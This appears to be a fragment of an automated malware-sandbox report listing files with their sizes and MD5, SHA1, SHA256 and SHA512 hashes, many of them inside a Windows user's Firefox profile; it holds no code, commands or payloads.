SHA5127e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80
-
Filesize
384KB
MD5dfd5f78a711fa92337010ecc028470b4
SHA11a389091178f2be8ce486cd860de16263f8e902e
SHA256da96f2eb74e60de791961ef3800c36a5e12202fe97ae5d2fcfc1fe404bc13c0d
SHA512a3673074919039a2dc854b0f91d1e1a69724056594e33559741f53594e0f6e61e3d99ec664d541b17f09ffdebc2de1b042eec19ca8477fac86359c703f8c9656
-
Filesize
1.8MB
MD5e72fd16086a8ecf58337b89509435373
SHA18352b01f92cdfa8e5c932513e2ef6363a6a5871c
SHA2561e76927aa56820767353dd841c3f309f91eb10decead250755a984791efad821
SHA5123cb26d20b5138ebcdef1adaea9b8fa0bfc7b56862c3ac5b7500a419a6836e3e2656aab697f6459131b0d8672123411dc60d1e15d7c745aa881580ec5c6d3c841
-
Filesize
949KB
MD50f47fcde37bf99983f14b406fe58f131
SHA16f6ba643fa07d97be4c0a1c5250dff3a6b67a0ff
SHA256e93220353bc583c6c042a2bd0f3b404a77da4b5d1781051bef8132e22abc12c2
SHA512ddf01c9bb332edee6c3cd4c803ac48ae388389b5ed9e7e294664f4a4b12f823d86099cb831745d6bea8f562c7a59d61e59ff78870d2eedd64f549c48fb345aa4
-
Filesize
1.7MB
MD56731bd7e893f440a5f73edfd40b73112
SHA18e396ca101830e0116881c8d8c81c6d5e7918afe
SHA256599399619509681016345f5e4e50f6edd38a70496201d1a9fbfe5c53d7f4690b
SHA512d0247ad0a1392a9b622d08e22feee7d79854c8f1492f0b4d5d5e669f7efce409e3a3961f8229ebb40aca97ed6e36066b40393b3e9cb78d7356d34d530c125110
-
Filesize
2.7MB
MD59aa3e28acbd0b5a2e045a6d513c93b6b
SHA19381e49745b0e1c2fab053f8d4d2a59bc61988f1
SHA2562f1568be0dd8f9a154b003441a09464578fc012d81f60faab98f8ba9c1913898
SHA512994aacaaafb7a60400aa05ad2524eac325b50b46109a75a71e2907e0dc08b5147ad7f63d308c72b92dc70d232335134815b461b00c18c722a365e6e0f8491471
-
Filesize
2.5MB
MD52a78ce9f3872f5e591d643459cabe476
SHA19ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA25621a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA51203e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9
-
Filesize
3.0MB
MD5d6759f231670dd66b95e2cf066d7e066
SHA108f13e2e757a55936174d6a596a6d9c8fab41831
SHA256e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292
SHA512eee5f50336e71511cf5380c78c302405e355ac021757dcff08fbdf76a29dd4e0cfd5bba36e74ab7ae0fe63e60adb111b5d6437ed4525d5aa90878088dac842c3
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
33B
MD5fadb1d7b567cf2a274ba3f3dea091bc1
SHA169ae77407b65dbae20e0181037e552a417dc53cf
SHA256d9e13cf7d93064b70f49b5ffebdf9e8ff496f7daa875f6a29591fe8a469cd8a1
SHA512964d566538dab9977da900d5c8e24a7cf1da4b095f4820d2abd8fcd635cca231a82ab428a670b79324350e190c8aa47b97e94b20ab332a5e42dbd6dfbb92ab54
-
Filesize
9KB
MD515fc16ccf01b7fef371de15476e0a02a
SHA1ece3cee3244326d028e6496fac37cac98e19cb21
SHA256998ee1419f46e67f7af86e3369b66b22b75a5b4365bd43f2f64167a98801611b
SHA51294b7578b62164911388315b000b3c8b3e13ac2c3b61ae7ba17bebab414cabca440b92ad93cd9fca78384b194e7daae6010751d5ed5a2ce31820813fd3a396d12
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize6KB
MD518b4f2198c809043d9ca8164b8a144bc
SHA1729f1451faecb1bd0f80b688e3187f47b5d7e0fe
SHA256a95cc83f2a604a5f21f2e42ee4a7ba08a873c9e1c5a2cb9a85c2a7fd4dd7f30e
SHA512bc3c8eaccd32b8988752093a835f16431dfdc8f7736921bb2fd9b94f39e7f6599b2a186a74521e673ff7f4d2a342e38e9c70add62cd16e982cae261e3675d86a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize10KB
MD5a3320b98c1cb37f485fcc83ec422f5ea
SHA169ff1b1f9ee5d8291f2732a86e88b745085c2f19
SHA256377864cfa239105872c0da9ba02cd04cba077131d1a369f428f6d4e4efb96772
SHA512c469bb829d0fdf78268d43a6723ec9a56e6e7b510910561050e338c3919cb91fa95bf4cea7fc60d941df8657de8ced6aac1197e5f6dccbf82332f5cc26784311
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5259f19c343fdf3920aa6081223f6fe14
SHA153165a18ab5f66b0bb8c7df08e9e263508f0e8e0
SHA25634ff4c4bb47c6a3c75ec8fbc06df9ca577d060f514509cbeb8be3479a5b9ffe9
SHA51230523179cde5bce595504349d314d1ec02ef8fc9c6e0335773884c53c4e96491ba94387ed528c0edc494f78ef8774df99c6beae364628ad7cb5d6fcd7b44c13f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD5c13be739024369c2555be2a45618c31a
SHA13c2e313b3c6f7e7af0ea3cd6afb1a86664a6a184
SHA256705efbeefeb6c72c22d0d99f72993c984b2d46bf28a0908ad5f0ebbb86b532d1
SHA51251522b4536a96eaa9bf7814a312e3a7acecfb4cdfbf3bf0d8948687ecf90bfd78fec6a1f19626738861754cd87f3d13ea14d0ddfecf4f4cf49805be00e360687
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD52081d42caa52c5e076ec1d79ba4bf168
SHA1cbf101043d251b46c7c8af0631cb0d1288d726f2
SHA256d80b943bbe558302289d064b902ae050a9b16893d6ba403fa52edcb4af90736b
SHA512e29d84d0170f2923ed08f0afcc17d021ab4a7ef5797b0748dc6c067e7f678a1c188bacbad658eac13a080240f1247db3b4d9688ad7a98bd12c9f293dde934482
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5b24986923474d429627abb9eb3a7dadd
SHA1a0319a27a6a5282eef92d5ed74c7394c162e1f20
SHA25614d61ddc836540becf0a02fd82f7beeefe68206b44475f7738170ebfad1997b8
SHA5126a93444b39a351e3a7993f1efd7808f4433da62eac1b30d8d4560a2c329c2df3dbc4e478bc5a771b99280a3ec04f2470122c067ac30dfc4351f5492106938557
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\3ddc2f3f-9913-4581-8f96-ee38ffd35a98
Filesize26KB
MD542425b2662166e4ce1ffa93cd6c99417
SHA1e665ac4380ba5693038b21d253e18447b69a58df
SHA25641c89889d74939b294aab2539011f5a199dc75915223b1131509147726e81c2d
SHA5126f46c682ae4fd26c1c73f3bfbd4de05864e7b6ccfc7aac6add6f98ac5275cf6e7f751a917e925572756c24a3e9792d01c54fa7e14f5ea9b12e5ff8732fb5f15f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\6e48605f-fd39-4174-83af-4545928d57e2
Filesize982B
MD5a29e66322638d1580669d490004ea80f
SHA1875e4700d771df6fee7856a7c4b25e08f74aac2b
SHA2561bc117332ca5ddd64e2929a787c92a5c364e36011dff56b0270c17638f66b656
SHA512bc5f770d49e1e157c5ae3f95caf533e9abefd9800b9a646f930308cbc1c585063376b2d56f30c48278c836b5a695f598bf224fb8463c7b12d5a7179e967ef682
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\6f6dad35-f2d4-4eee-ad61-9d077e1c2e16
Filesize671B
MD50a91646e67491cc18d35dbd54f87ee70
SHA150b4493a9dec359a56f2cc3b71e3e48b47350c66
SHA2566a6621b468d4bec25111d3c729aed4bee5fb56ddee58283d72fb951de744ca76
SHA512bcf5a163b23198939ed47787177776b3b9c231242f8c64f3d524fdc6d2560782629862dc2a7db2b8a6a396be6b1c38fc26ada36cb3d12785940fc615381f06fb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
12KB
MD5a3a9ca8504d337cbcf84adef4710ab89
SHA1d74b5efc006020c2a8d94bda2a7895d8a96e4cce
SHA256e99fbfedf1590807488669a84d41c74309246dd489c05eb04992a694cce50959
SHA5128062f3a1fca10052d2127f3e2ed06728030c51711f90561168496b215f9a1d43fac9e3febd60bcd61dcd24fe235795c1a442dbf1ab68d4c36fc178cc839a74fe
-
Filesize
15KB
MD55a7d8a649e6e69ab66990530e3508665
SHA18661aa8be245c50499c52b5d75be0e3c5edc9bf4
SHA25648877bdb9ef8030a558f2ffb619b63c45847c442eb3ba7e83ccc89c293941108
SHA512947e854188c3cd0a58fb7e45b6328a1222fdfe42333a0427bd2e15ae6bf94eb4b1bac544e2aa3cd4619a9f3441596650da99d6dbda2b7e29bffc6b7ba3d75665
-
Filesize
10KB
MD5f137bec5c7ff803748eb253f1accd2b6
SHA191dc9786ea326883185b87af86ed5768eca3a8d6
SHA2561146260f08ef207e49b25bcedc9de3b180dc4150e02687da86ea97d60b1a40b8
SHA512ea0d7b8e7055d980902f89def04be0292f779711b3ad48a55a5b26b0657c2b2eff0e48530eb8341f1accc8d0b6406f389a957102e5f3008f89214a7b6de010ce
-
Filesize
10KB
MD5fdaa430b46bad66e86b28a81f9a5f007
SHA154f74752f5d0491e8a5e5d935ef0ab6978adf463
SHA2566d078f8fb21b1d162b0d5b5e617bf2f58c3d1f1efa944a62873efd5431e0357a
SHA5124dbf0c9a4394c79539f363cda44f42e65b1e311b4d622f8c351d64ef760fad3abcfa37cb18c24ea2950f1356ade3317042e7292e6f5007e6d688c27370216729
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize792KB
MD5c4639cdcc0d3b9928f121a3bc60b33e9
SHA1bd74818d86bc37f6326483378dd9d6b45fd76753
SHA2565f0c22fa4438307363d32dccb94778819ccf4325eecfa5952c98b6cb1f909553
SHA512be0ffc1347e272e8e7c08b061bf8b6b32963d7e898a53bf4c7cbd3981d273d7870807d788384cb993e43b7750ec5e31dd5a189d94a620821238733ffd21b165a